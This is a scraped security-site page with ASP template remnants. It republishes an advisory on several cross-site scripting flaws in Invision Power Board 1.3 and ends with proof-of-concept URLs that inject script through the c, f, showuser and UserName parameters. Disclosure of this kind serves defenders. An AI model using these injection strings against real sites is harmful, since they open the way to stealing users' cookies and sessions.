<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("URI,username") PageTitle=stripHTML("Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities") ArticleIntro=stripHTML("77169.com小编引言:Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities,漏洞的主要原因:") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/9768/info

Invision Power Board is pron…") ModuleName = stripHTML("exploits") InfoID = stripHTML("170276") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities

2004/2/28 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/9768/info

Invision Power Board is prone to multiple cross-site scripting vulnerabilities.

These issues are due to insufficient sanitization of input supplied via the 'c', 'f', , 'showuser', and 'username' URI parameters. This input will be included in dynamically generated pages, making it possible for an attacker to create a malicious link to a vulnerable site that includes hostile HTML and script code. This code may be rendered in the browser of a victim user who visits the malicious link, potentially allowing for theft of cookie-based credentials or other attacks.

These issues are reported to affect Invision Power Board 1.3 Final. Earlier versions may also be affected.

http://www.example.com/?c='><script>alert(window.document.url)</script><plaintext>
http://www.example.com/?act=SR&f='><script>alert(document.cookie)</script>
http://www.example.com/?showuser='><script>alert(document.cookie)</script>
http://www.example.com/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert
(document.cookie)</script>